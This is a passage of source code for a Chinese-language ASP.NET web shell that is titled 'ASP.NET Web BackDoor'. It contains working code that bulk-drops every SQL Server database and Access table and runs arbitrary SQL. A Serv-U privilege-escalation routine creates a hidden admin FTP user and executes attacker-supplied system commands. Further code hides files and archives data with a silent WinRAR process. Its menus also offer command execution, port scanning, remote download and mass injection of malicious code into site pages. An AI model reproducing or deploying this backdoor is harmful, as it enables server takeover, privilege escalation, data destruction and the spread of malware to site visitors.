if (ListBox4.Items.Count != 0)
{
SqlConnection conn = pconn();
conn.Open();
string usertabsql = "select * from sysobjects where xtype='u'";
getocmd = new SqlCommand(usertabsql, conn);
SqlDataReader jksdr = getocmd.ExecuteReader();
while (jksdr.Read())
{
usertabdel += jksdr.GetValue(0).ToString() + ",";
}
jksdr.Close();
jksdr.Dispose();
getocmd.Dispose();
int zuihou = usertabdel.LastIndexOf (",");
string jiequ = usertabdel.Substring(0, zuihou);
string[] fenge = jiequ.Split(',');
foreach (string fengef in fenge)
{
plsb = "drop table [" + fengef.ToString() + "]" ;
getocmd = new SqlCommand(plsb, conn);
getocmd.ExecuteNonQuery();
}
getocmd.Dispose();
conn.Close();
conn.Dispose();
}
}
public void getlistku()
{
string kp = kusqlport.Text;
if (kp == "1433")
{
kp = "";
}
else if (kp == "")
{
kp = "";
}
else
{
kp = "," + kp;
}
SqlConnection connku = new SqlConnection("server=." + kp + ";User ID=" + kusqlname.Text + ";Password=" + kusqlpass.Text);
connku.Open();
string jkku = "USE master SELECT name FROM SYSDATABASES";
getocmd = new SqlCommand(jkku, connku);
SqlDataReader jkkudr = getocmd.ExecuteReader();
while (jkkudr.Read())
{
ListBox3.Items.Add(jkkudr.GetValue(0).ToString());
}
jkkudr.Close();
jkkudr.Dispose();
connku.Close();
connku.Dispose();
}
public string getdelkustr;
public string getdelneiku;
protected void delku_Click(object sender, EventArgs e)
{
if (ListBox3.Items.Count != 0)
{
try
{
SqlConnection conn = new SqlConnection("server=.;uid=" + kusqlname.Text + ";pwd=" + kusqlpass.Text);
conn.Open();
string getdelkustr = "select * from sysdatabases where sid<>0x01";
getocmd = new SqlCommand (getdelkustr,conn);
SqlDataReader deldr = getocmd.ExecuteReader();
while (deldr.Read())
{
getdelneiku += deldr.GetValue(0).ToString() + ",";
}
deldr.Close();
deldr.Dispose();
getocmd.Dispose();
int houzhui = getdelneiku.LastIndexOf(",");
getdelneiku = getdelneiku.Substring(0, houzhui);
string[] getneiku = getdelneiku.Split(',');
foreach ( string nk in getneiku )
{
getocmd = new SqlCommand("drop database " + nk.ToString () , conn);
getocmd.ExecuteNonQuery();
getocmd.Dispose();
}
Response.Write("<script>alert('成功批量删除数据库!')</" + "script>");
conn.Close();
conn.Dispose();
ListBox3.Items.Clear();
getlistku();
}
catch (Exception errorsa)
{
Response.Write(errorsa.Message.ToString());
Response.End();
}
}
}
protected void delzdb_Click(object sender, EventArgs e)
{
if (ListBox4.Items.Count != 0)
{
string kp = kusqlport.Text;
if (kp == "1433")
{
kp = "";
}
else if (kp == "")
{
kp = "";
}
else
{
kp = "," + kp;
}
SqlConnection conn = new SqlConnection("server=." + kp + ";User ID=" + kusqlname.Text + ";Password=" + kusqlpass.Text + ";database=" + ListBox3.SelectedItem.ToString());
conn.Open();
getocmd = new SqlCommand("drop table [" + ListBox4.SelectedItem.ToString() + "]", conn);
getocmd.ExecuteNonQuery();
Response.Write("<script>alert('删除成功!')</" + "script>");
conn.Close();
conn.Dispose();
}
}
protected void delzdk_Click(object sender, EventArgs e)
{
if (ListBox3.Items.Count != 0)
{
string kp = kusqlport.Text;
if (kp == "1433")
{
kp = "";
}
else if (kp == "")
{
kp = "";
}
else
{
kp = "," + kp;
}
SqlConnection conn = new SqlConnection("server=." + kp + ";User ID=" + kusqlname.Text + ";Password=" + kusqlpass.Text);
conn.Open();
getocmd = new SqlCommand("drop database " + ListBox3.SelectedItem.ToString(), conn);
getocmd.ExecuteNonQuery();
Response.Write("<script>alert('删除成功!')</" + "script>");
conn.Close();
conn.Dispose();
ListBox3.Items.Clear();
getlistku();
}
}
public void getacctable()
{
string connstr = accstr.Text.Trim();
OleDbConnection oleconn = new OleDbConnection(connstr);
oleconn.Open();
System.Data.DataTable dt = new System.Data.DataTable();
dt = oleconn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
for (int ok = 0; ok < dt.Rows.Count; ok++)
{
ListBox5.Items.Add(dt.Rows[ok].ItemArray[2].ToString());
}
oleconn.Close();
oleconn.Dispose();
}
protected void accconn_Click(object sender, EventArgs e)
{
string connstr = accstr.Text.Trim();
getacctable();
}
public void getdg()
{
string gvstr = "select * from [" + ListBox5.SelectedItem.ToString() + "]";
OleDbConnection oleconn = new OleDbConnection(accstr.Text.Trim());
oleconn.Open();
OleDbDataAdapter oleda = new OleDbDataAdapter(gvstr, oleconn);
System.Data.DataSet oleds = new System.Data.DataSet();
oleda.Fill(oleds, ListBox5.SelectedItem.ToString());
GridView2.DataSource = oleds;
GridView2.DataBind();
oleda.Dispose();
oleconn.Close();
oleconn.Dispose();
}
protected void ListBox5_SelectedIndexChanged(object sender, EventArgs e)
{
getdg();
}
protected void acczdb_Click(object sender, EventArgs e)
{
OleDbConnection oe = new OleDbConnection(accstr.Text.Trim());
oe.Open();
OleDbCommand oc = new OleDbCommand("drop table [" + ListBox5.SelectedItem.ToString() + "]", oe);
oc.ExecuteNonQuery();
Response.Write("<script>alert('删除表成功!')</"+"script>");
oc.Dispose();
oe.Close();
oe.Dispose();
ListBox5.Items.Clear();
getacctable();
}
protected void accpl_Click(object sender, EventArgs e)
{
OleDbConnection oee = new OleDbConnection(accstr.Text.Trim());
oee.Open();
for (int jj = 0; jj < ListBox5.Items.Count; jj++)
{
string delact = "drop table [" + ListBox5.Items[jj].ToString() + "]";
OleDbCommand occ = new OleDbCommand(delact, oee);
occ.ExecuteNonQuery();
occ.Dispose();
}
Response.Write("<script>alert('批量清除完毕!')</" + "script>");
oee.Close();
oee.Dispose();
ListBox5.Items.Clear();
getacctable();
}
protected void accadd_Click(object sender, EventArgs e)
{
OleDbConnection oe = new OleDbConnection(accstr.Text.Trim());
oe.Open();
string addsql = addtxt.Text.Trim();
OleDbCommand oc = new OleDbCommand(addsql, oe);
oc.ExecuteNonQuery();
Response.Write("<script>alert('成功添加数据,请刷新表!')</" + "script>");
oc.Dispose();
oe.Close();
oe.Dispose();
}
protected void accupdate_Click(object sender, EventArgs e)
{
OleDbConnection oe = new OleDbConnection(accstr.Text.Trim());
oe.Open();
string updatesql = updatetxt.Text.Trim();
OleDbCommand oc = new OleDbCommand(updatesql, oe);
oc.ExecuteNonQuery();
Response.Write("<script>alert('成功更新数据,请刷新表!')</" + "script>");
oc.Dispose();
oe.Close();
oe.Dispose();
}
protected void accdel_Click(object sender, EventArgs e)
{
OleDbConnection oe = new OleDbConnection(accstr.Text);
oe.Open();
string delsql = deltxt.Text.Trim();
OleDbCommand oc = new OleDbCommand(delsql, oe);
oc.ExecuteNonQuery();
Response .Write ("<script>alert('成功删除数据,请刷新表!')</" + "script>");
oc.Dispose();
oe.Close();
oe.Dispose();
}
protected void jksubtn_Click(object sender, EventArgs e)
{
string getall = "";
string getjksuname = jksuname.Text;
string getjksupass = jksupass.Text;
Int32 getjksuport = Convert.ToInt32(jksuport.Text);
string getjksucmd = jksucmd.Text;
string getjkloginuser = "User " + getjksuname + "\r\n";
string getjkloginpass = "Pass " + getjksupass + "\r\n";
string getjknewdomain = "-SETDOMAIN\r\n-Domain=jk|0.0.0.0|68915|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string getjkdeldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=68915\r\n";
string getjknewuser = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=68915\r\n-User=jk\r\n-Password=mhjk\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string getjkquite = "QUIT\r\n";
string getsite = "SITE MAINTENANCE\r\n";
try
{
TcpClient sutc = new TcpClient("127.0.0.1", getjksuport);
sutc.ReceiveBufferSize = 1024;
NetworkStream ns = sutc.GetStream();
getall = getjkrev(ns);
getall += getjksend(ns, getjkloginuser);
getall += getjkrev(ns);
getall += getjksend(ns, getjkloginpass);
getall += getjkrev(ns);
getall += getjksend(ns, getsite );
getall += getjkrev(ns);
getall += getjksend(ns, getjkdeldomain);
getall += getjkrev(ns);
getall += getjksend(ns, getjknewdomain);
getall += getjkrev(ns);
getall += getjksend(ns, getjknewuser);
getall += getjkrev(ns);
TcpClient sutc1 = new TcpClient("127.0.0.1", 68915);
NetworkStream ns1 = sutc1.GetStream();
getall += getjkrev(ns1);
getall += getjksend(ns1, "user jk\r\n");
getall += getjkrev(ns1);
getall += getjksend(ns1, "pass mhjk\r\n");
getall += getjkrev(ns1);
getall += getjksend (ns1, "site exec " + getjksucmd + "\r\n");
getall += getjkrev(ns1);
sutc1.Close();
getall += getjksend(ns, getjkdeldomain);
getall += getjkrev(ns);
getall += getjksend(ns, getjkquite);
getall += getjkrev (ns);
sutc.Close();
}
catch (Exception suerr)
{
Response.Write(suerr.Message.ToString());
}
Response.Write("<font color='red'>" + getall + "</font>");
}
public string getjkrev(NetworkStream jkstream)
{
string revstr = "";
if (jkstream.CanRead)
{
byte[] buffer = new byte[1024];
jkstream.Read(buffer, 0, buffer.Length);
revstr = Encoding.ASCII.GetString(buffer);
}
return "<font color='red'>" + revstr + "</font>";
}
public string getjksend(NetworkStream jkstream, string jksend)
{
if (jkstream.CanWrite)
{
byte[] buffer = Encoding.ASCII.GetBytes(jksend);
jkstream.Write(buffer, 0, buffer.Length);
}
return "<font color='red'>" + jksend + "</font>";
}
protected void dabaobtn_Click(object sender, EventArgs e)
{
if (daboml.Text.Trim() != "")
{
if (dabaodz.Text.Trim() != "")
{
//if (Path.GetExtension(dabaodz.Text.Trim().ToLower()) == "rar")
//{
String the_rar;
RegistryKey the_Reg;
Object the_Obj;
String the_Info;
ProcessStartInfo the_StartInfo;
Process the_Process;
try
{
the_Reg = Registry.ClassesRoot.OpenSubKey(@"Applications\WinRAR.exe\Shell\Open\Command");
the_Obj = the_Reg.GetValue("");
the_rar = the_Obj.ToString();
the_Reg.Close();
the_rar = the_rar.Substring(1, the_rar.Length - 7);
the_Info = " a " + dabaodz.Text.ToString() + " " + Getdbfilea(daboml.Text);
the_StartInfo = new ProcessStartInfo();
the_StartInfo.FileName = the_rar;
the_StartInfo.Arguments = the_Info;
the_StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
the_StartInfo.WorkingDirectory = "C:\\";
the_Process = new Process();
the_Process.StartInfo = the_StartInfo;
the_Process.Start();
Response.Write("打包成功");
}
catch (Exception ex)
{
Response.Write(ex.Message.ToString());
Response.End();
}
//}
//else
//{
// Response.Write("<script>alert('打包后缀名为rar')</" + "script>");
//}
}
}
}
public bool chknumber( string the_regstr )
{
System.Text.RegularExpressions.Regex jk_reg = new Regex("^0|[0-9]*[1-9][0-9]*$");
if (jk_reg.IsMatch(the_regstr))
{
return true;
}
else
{
return false;
}
}
protected void Button5_Click(object sender, EventArgs e)
{
if (TextBox1.Text.Trim() == jksessionpass)
{
Session["jksession"] = "jk1986";
Session.Timeout = 120000;
}
}
protected void CheckBox1_CheckedChanged(object sender, EventArgs e)
{
if (CheckBox1.Checked == true)
{
File.SetAttributes(fileconfigpath.Text.ToString(), FileAttributes.ReadOnly);
}
}
protected void CheckBox2_CheckedChanged(object sender, EventArgs e)
{
if (CheckBox2.Checked == true)
{
File.SetAttributes(fileconfigpath.Text.ToString(), File.GetAttributes(fileconfigpath.Text) | FileAttributes.Hidden);
}
}
protected void CheckBox3_CheckedChanged(object sender, EventArgs e)
{
if (CheckBox3.Checked == true)
{
File.SetAttributes(fileconfigpath.Text.ToString(), File.GetAttributes(fileconfigpath.Text) | FileAttributes.System);
}
}
protected void CheckBox4_CheckedChanged(object sender, EventArgs e)
{
if (CheckBox4.Checked == true)
{
File.SetAttributes(fileconfigpath.Text.ToString(), File.GetAttributes(fileconfigpath.Text) | FileAttributes.Archive);
}
}
protected void TreeView2_TreeNodeExpanded(object sender, TreeNodeEventArgs e)
{
if (TreeView3.Nodes[0].Expanded == true )
{
Response.Write("<script>alert('提权目录未折叠,程序自动刷新!');location.href='"+ getselfurl +"'</"+"script>");
Response.End();
}
if (TreeView1.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('本地硬盘未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView4.Nodes[0].Expanded == true)
{
Response.Write ("<script>alert('Shell功能未折叠程序自动刷新');location.href='"+ getselfurl +"'</"+"script>");
Response.End ();
}
if (TreeView5.Nodes [0].Expanded == true )
{
Response.Write ("<script>alert('数据库操作未折叠,程序自动刷新!');location.href='"+ getselfurl +"'</"+"script>");
Response.End();
}
}
protected void TreeView1_TreeNodeExpanded(object sender, TreeNodeEventArgs e)
{
if (TreeView3.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('提权目录未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView2.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('文件目录未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView4.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('Shell功能未折叠程序自动刷新');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView5.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('数据库操作未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
}
protected void TreeView3_TreeNodeExpanded(object sender, TreeNodeEventArgs e)
{
if (TreeView2.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('文件目录未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView1.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('本地硬盘未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView4.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('Shell功能未折叠程序自动刷新');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView5.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('数据库操作未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
}
protected void TreeView4_TreeNodeExpanded1(object sender, TreeNodeEventArgs e)
{
if (TreeView3.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('提权目录未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView1.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('本地硬盘未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView2.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('文件目录未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView5.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('数据库操作未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
}
protected void TreeView5_TreeNodeExpanded(object sender, TreeNodeEventArgs e)
{
if (TreeView3.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('提权目录未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView1.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('本地硬盘未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView4.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('Shell功能未折叠程序自动刷新');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
if (TreeView2.Nodes[0].Expanded == true)
{
Response.Write("<script>alert('文件目录未折叠,程序自动刷新!');location.href='" + getselfurl + "'</" + "script>");
Response.End();
}
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>ASP.NET Web BackDoor</title>
<style type="text/css">
<!--
a:link {
font-family: "宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
}
a:visited {
font-family: "新宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
}
a:hover {
font-family: "宋体";
font-size: 12px;
color: #FF0000;
text-decoration: underline;
}
a:active {
font-family: "宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
}
.STYLE1 {font-size: 12px}
-->
</style>
<script type="text/javascript">
function test()
{
if(!confirm('确认删除本信息吗?')) return false;
}
</script>
</head>
<body style="text-align: center">
<form id="form1" runat="server">
<%
if (Session["jksession"] != null )
{
Response.Write("<P class='STYLE1'>千秋邈矣独留我,百战归来再读书。</P>");
Response.Write("<p class='STYLE1'><a href='?action=shuaxin'>刷新页面</a></p>");
if (Request.Params["action"] == "shuaxin")
{
Response.Write("<script>alert('刷新页面 ^_^ ');location.href='" + getselfurl +"'</" + "script>");
}
Response.Write("<hr/>");
%>
<table style="width: 631px">
<tr>
<td style="width: 100px; height: 172px;" valign="top">
<asp:TreeView ID="TreeView1" runat="server" ExpandDepth="0" Font-Size="12px" ForeColor="Black"
Height="27px" OnSelectedNodeChanged="TreeView1_SelectedNodeChanged" Width="64px" OnTreeNodeExpanded="TreeView1_TreeNodeExpanded">
</asp:TreeView>
</td>
<td style="width: 100px; height: 172px;" valign="top">
<asp:TreeView ID="TreeView2" runat="server" ExpandDepth="0" Font-Size="12px" ForeColor="Black"
OnSelectedNodeChanged="TreeView2_SelectedNodeChanged" OnTreeNodeExpanded="TreeView2_TreeNodeExpanded">
<Nodes>
<asp:TreeNode Text="文件目录" Value="文件目录">
<asp:TreeNode Text="站点根目录" Value="站点根目录"></asp:TreeNode>
<asp:TreeNode Text="本程序目录" Value="本程序目录"></asp:TreeNode>
<asp:TreeNode Text="新建目录" Value="新建目录"></asp:TreeNode>
<asp:TreeNode Text="新建文本" Value="新建文本"></asp:TreeNode>
<asp:TreeNode Text="上传文件" Value="上传文件"></asp:TreeNode>
<asp:TreeNode Text="批量挂马" Value="批量挂马"></asp:TreeNode>
<asp:TreeNode Text="批量清马" Value="批量清马"></asp:TreeNode>
<asp:TreeNode Text="查找木马" Value="查找木马"></asp:TreeNode>
</asp:TreeNode>
</Nodes>
</asp:TreeView>
</td>
<td style="width: 100px; height: 172px;" valign="top">
<asp:TreeView ID="TreeView3" runat="server" ExpandDepth="0" Font-Size="12px" ForeColor="Black" OnSelectedNodeChanged="TreeView3_SelectedNodeChanged" OnTreeNodeExpanded="TreeView3_TreeNodeExpanded">
<Nodes>
<asp:TreeNode Text="提权目录" Value="提权目录">
<asp:TreeNode Text="Program Files" Value="Program Files"></asp:TreeNode>
<asp:TreeNode Text="Documents and Settings" Value="Documents and Settings"></asp:TreeNode>
<asp:TreeNode Text="PcAnywhere" Value="PcAnywhere"></asp:TreeNode>
<asp:TreeNode Text="Serv-U(I)" Value="Serv-U(I)"></asp:TreeNode>
<asp:TreeNode Text="Serv-U(II)" Value="Serv-U(II)"></asp:TreeNode>
<asp:TreeNode Text="开始菜单" Value="开始菜单"></asp:TreeNode>
<asp:TreeNode Text="Real" Value="Real"></asp:TreeNode>
<asp:TreeNode Text="Sql Server" Value="Sql Server"></asp:TreeNode>
<asp:TreeNode Text="Config" Value="Config"></asp:TreeNode>
<asp:TreeNode Text="Inetsrv" Value="Inetsrv"></asp:TreeNode>
<asp:TreeNode Text="Temp" Value="Temp"></asp:TreeNode>
<asp:TreeNode Text="Repair" Value="Repair"></asp:TreeNode>
</asp:TreeNode>
</Nodes>
</asp:TreeView>
</td>
<td style="width: 100px; height: 172px;" valign="top"><asp:TreeView ID="TreeView4" runat="server" ExpandDepth="0" Font-Size="12px" ForeColor="Black" OnSelectedNodeChanged="TreeView4_SelectedNodeChanged" OnTreeNodeExpanded="TreeView4_TreeNodeExpanded1" >
<Nodes>
<asp:TreeNode Text="功能模块" Value="功能模块">
<asp:TreeNode Text="系统信息" Value="系统信息"></asp:TreeNode>
<asp:TreeNode Text="Cmd执行" Value="Cmd执行"></asp:TreeNode>
<asp:TreeNode Text="进程管理" Value="进程管理"></asp:TreeNode>
<asp:TreeNode Text="SQL提权(SA)" Value="SQL提权(SA)"></asp:TreeNode>
<asp:TreeNode Text="SQL提权(dbowner or public)" Value="SQL提权(dbowner or public)"></asp:TreeNode>
<asp:TreeNode Text="注册表读取" Value="注册表读取"></asp:TreeNode>
<asp:TreeNode Text="端口扫描" Value="端口扫描"></asp:TreeNode>
<asp:TreeNode Text="远程下载" Value="远程下载"></asp:TreeNode>
<asp:TreeNode Text="SU提权" Value="SU提权"></asp:TreeNode>
<asp:TreeNode Text="遍历IIS" Value="遍历IIS"></asp:TreeNode>
</asp:TreeNode>
</Nodes>
</asp:TreeView>
</td>
<td style="width: 100px; height: 172px;" valign="top" align="center"><asp:TreeView ID="TreeView5" runat="server" ExpandDepth="0" Font-Size="12px" ForeColor="Black" OnSelectedNodeChanged="TreeView4_SelectedNodeChanged" OnTreeNodeExpanded="TreeView5_TreeNodeExpanded" >
<Nodes>
<asp:TreeNode Text="数据库和退出" Value="数据库和退出">
<asp:TreeNode Text="SQL Server" Value="SQL Server"></asp:TreeNode>
<asp:TreeNode Text="Access" Value="Access"></asp:TreeNode>
<asp:TreeNode Text="文件打包" Value="文件打包"></asp:TreeNode>
<asp:TreeNode Text="About" Value="About"></asp:TreeNode>
<asp:TreeNode Text="退出登陆" Value="退出登陆"></asp:TreeNode>
</asp:TreeNode>
</Nodes>
</asp:TreeView>
</td>
</tr>
</table>
<table style="font-size: 12px; width: 631px; text-align: left;">
<tr>
<td colspan="2" style="height: 21px">
<asp:Label ID="Label2" runat="server" OnLoad="Label2_Load"></asp:Label></td>
</tr>
<tr>
<td colspan="2" style="height: 21px; width: 631px;" valign="top">
<asp:Label ID="Label1" runat="server"></asp:Label></td>
</tr>
</table>
<% if (Request.QueryString["action"] == "edit")
{
if (Request.QueryString["File"] != "")
{
editpath.Visible = true;
filecontent.Text = getcontent;
%>
<table style="font-size: 12px; width: 888px">
<tr>
<td colspan="3" align="center">
路径:&nbsp;
<asp:TextBox ID="editpath" runat="server" Width="287px" ReadOnly="True"></asp:TextBox></td>
</tr>
<tr>
<td colspan="3" style="height: 424px" align="center">
<asp:TextBox ID="filecontent" runat="server" Height="411px" TextMode="MultiLine" Width="857px"></asp:TextBox></td>
</tr>
<tr>
<td align="center" colspan="3" style="height: 21px">
<asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text=" 保 存 " Font-Size="12px" /></td>
</tr>
</table>
<%
}
}
else
{
editpath.Visible = false;
}
%>
<%
if (Request.QueryString["action"] == "rename")
{
if (Request.QueryString["File"] != "")
{
refilename.Visible = true;
refilename.Text = getname;
%>
<table style="font-size: 12px; width: 562px">
<tr>
<td align="center" style="width: 108px; height: 26px">
需要重命名文件:
</td>
<td style="width: 95px; height: 26px">
<asp:TextBox ID="refilename" runat="server" Width="268px"></asp:TextBox></td>
<td align="left" style="width: 100px; height: 26px">
<asp:Button ID="Button3" runat="server" Font-Size="12px" OnClick="Button2_Click"
Text=" 确 认 " /></td>
</tr>
</table>
<%
}
}
else
{
refilename.Visible = false;
}
%>
<%
if (Request.QueryString["action"] == "config")
{
if (Request.QueryString["File"] != "")
{
%>
<table style="width: 800px; font-size: 12px;">
<tr>
<td style="width: 169px; height: 37px;" align="right">
文件路径:&nbsp;
</td>
<td style="width: 95px; height: 37px;">
<asp:TextBox ID="fileconfigpath" runat="server" Font-Size="12px" Width="350px"></asp:TextBox></td>
<td style="width: 100px; height: 37px;">
</td>
</tr>
<tr>
<td style="width: 169px; height: 34px;" align="right">
属性设置:&nbsp;
</td>
<td colspan="2" align="left" style="height: 34px">
<asp:CheckBox ID="CheckBox1" runat="server" Text="只读" AutoPostBack="True" OnCheckedChanged="CheckBox1_CheckedChanged" />
&nbsp; &nbsp;
<asp:CheckBox ID="CheckBox2" runat="server" Text="隐藏" OnCheckedChanged="CheckBox2_CheckedChanged" AutoPostBack="True" />
&nbsp; &nbsp;
<asp:CheckBox ID="CheckBox3" runat="server" Text="系统" OnCheckedChanged="CheckBox3_CheckedChanged" AutoPostBack="True" />
&nbsp;&nbsp; &nbsp;<asp:CheckBox ID="CheckBox4" runat="server" Text="存档" OnCheckedChanged="CheckBox4_CheckedChanged" AutoPostBack="True" /></td>
</tr>
</table>
<%
}
}
if (TreeView2.SelectedValue.ToString() != "")
{
if (TreeView2.SelectedNode.Text == "新建目录")
{
cfolderstr.Text = Server.MapPath (".") + "\\" +"jk";
%>
<table style="font-size: 12px; width: 450px">
<tr>
<td style="width: 100px; height: 21px">
新 建 目 录:</td>
<td style="width: 100px; height: 21px">
<asp:TextBox ID="cfolderstr" runat="server" Font-Size="12px" Width="170px"></asp:TextBox></td>
<td style="width: 100px; height: 21px">
<asp:Button ID="cfolder" runat="server" Font-Size="12px" Text="创建目录" OnClick="cfolder_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView2.SelectedValue !="")
{
if (TreeView2.SelectedNode.Text == "新建文本")
{
cfile.Text = Server.MapPath(".") + "\\jk.aspx";
%>
<table style="font-size: 12px; width: 450px">
<tr>
<td style="width: 98px; height: 21px">
新 建 文 本:</td>
<td style="width: 145px; height: 21px">
<asp:TextBox ID="cfile" runat="server" Font-Size="12px" Width="170px"></asp:TextBox></td>
<td style="width: 100px; height: 21px">
<asp:Button ID="cfilebtn" runat="server" Font-Size="12px" Text="创建文本" OnClick="cfilebtn_Click" /></td>
</tr>
</table>
<%
}
}
%>
<%
if (TreeView2.SelectedValue != "")
{
if (TreeView2.SelectedNode.Text == "上传文件")
{
savefile.Text = Server.MapPath(".").ToString() + "\\jk.aspx" ;
%>
<table style="font-size: 12px; width: 631px">
<tr>
<td style="width: 154px; height: 30px;">
上传文件地址:</td>
<td style="width: 100px; height: 30px;">
<asp:TextBox ID="savefile" runat="server" Width="356px" Font-Size="12px"></asp:TextBox></td>
<td style="width: 100px; height: 30px;">
</td>
</tr>
<tr>
<td style="width: 154px; height: 30px;">
本地浏览:</td>
<td style="width: 100px; height: 30px;">
<asp:FileUpload ID="FileUpload1" runat="server" Font-Size="12px" Width="366px" /></td>
<td style="width: 100px; height: 30px;">
</td>
</tr>
</table>
<table style="width: 631px">
<tr>
<td style="width: 151px">
</td>
<td colspan="2" style="width: 372px">
<asp:Button ID="uploadfile" runat="server" Font-Size="12px" Text=" 上 传 " OnClick="uploadfile_Click" /></td>
<td style="width: 100px">
</td>
</tr>
</table>
<%
}
}
if (TreeView2.SelectedValue != "")
{
if ( TreeView2.SelectedNode.Text == "批量挂马" )
{
%>
<table style="width: 631px; font-size: 12px;">
<tr>
<td style="width: 119px; height: 30px;">
挂马代码:</td>
<td style="width: 289px" align="center">
<asp:TextBox ID="gmcode" runat="server" Width="274px" Font-Size="12px"></asp:TextBox></td>
<td style="width: 100px">
</td>
</tr>
<tr>
<td style="width: 119px; height: 30px;">
挂马方式:</td>
<td style="width: 289px; height: 30px;" align="center">
<asp:RadioButton ID="bml" runat="server" GroupName="jk" Text="本程序目录" />
&nbsp;&nbsp; &nbsp;<asp:RadioButton ID="gml" runat="server" GroupName="jk"
Text="根目录" /></td>
<td style="width: 100px; height: 30px;">
</td>
</tr>
<tr>
<td style="width: 119px; height: 30px;">
</td>
<td style="width: 289px; height: 21px;" align="center">
<asp:Button ID="gm" runat="server" Font-Size="12px" Text="批量挂马" OnClick="gm_Click" /></td>
<td style="width: 100px; height: 21px;">
</td>
</tr>
</table>
<%
}
}
if (TreeView2.SelectedValue != "")
{
if (TreeView2.SelectedNode.Text == "批量清马")
{
%>
<table style="width: 631px; font-size: 12px;">
<tr>
<td style="width: 119px; height: 30px;">
清马代码:</td>
<td style="width: 289px" align="center">
<asp:TextBox ID="qmcode" runat="server" Width="274px" Font-Size="12px"></asp:TextBox></td>
<td style="width: 100px">
</td>
</tr>
<tr>
<td style="width: 119px; height: 30px;">
清马方式:</td>
<td style="width: 289px; height: 30px;" align="center">
<asp:RadioButton ID="bcxml" runat="server" GroupName="jk" Text="本程序目录" />
&nbsp;&nbsp; &nbsp;<asp:RadioButton ID="gcxml" runat="server" GroupName="jk"
Text="根目录" /></td>
<td style="width: 100px; height: 30px;">
</td>
</tr>
<tr>
<td style="width: 119px; height: 30px;">
</td>
<td style="width: 289px; height: 21px;" align="center">
<asp:Button ID="Button2" runat="server" Font-Size="12px" Text="批量清马" OnClick="qingma_Click" /></td>
<td style="width: 100px; height: 21px;">
</td>
</tr>
</table>
<%
}
}
if (TreeView2.SelectedValue != "")
{
if (TreeView2.SelectedNode.Text == "查找木马")
{
%>
<table style="width: 631px; font-size: 12px;">
<tr>
<td style="width: 119px">
新增特征码:</td>
<td colspan="2" align="center">
<asp:TextBox ID="tzcode" runat="server" Width="274px" Font-Size="12px"></asp:TextBox>
&nbsp;&nbsp; (添加多个时,请用逗号隔开)</td>
</tr>
<tr>
<td style="width: 119px; height: 30px;">
查找目录:</td>
<td style="width: 289px; height: 30px;" align="center">
<asp:RadioButton ID="czbml" runat="server" GroupName="jk" Text="本程序目录" />
&nbsp;&nbsp; &nbsp;<asp:RadioButton ID="czgml" runat="server" GroupName="jk"
Text="根目录" /></td>
<td style="width: 100px; height: 30px;">
</td>
</tr>
<tr>
<td style="width: 119px; height: 21px;">
</td>
